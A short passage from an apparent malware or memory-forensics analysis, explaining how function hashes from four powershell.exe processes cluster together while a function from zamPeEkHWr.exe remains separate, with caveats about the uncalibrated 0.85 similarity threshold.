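Run on the sample, the four powershell.exe functions (processes 5, 10, 15 and 23) fall into one cluster: their hashes differ in only a handful of positions, which is what you expect from the same .NET code being JIT-compiled in each fresh PowerShell instance. The zamPeEkHWr.exe function stays on its own. The threshold of 0.85 is a starting point for this data, not a calibrated value; on a full report you would compare clusters against the Opcode IDs as well before concluding that two regions hold the same function.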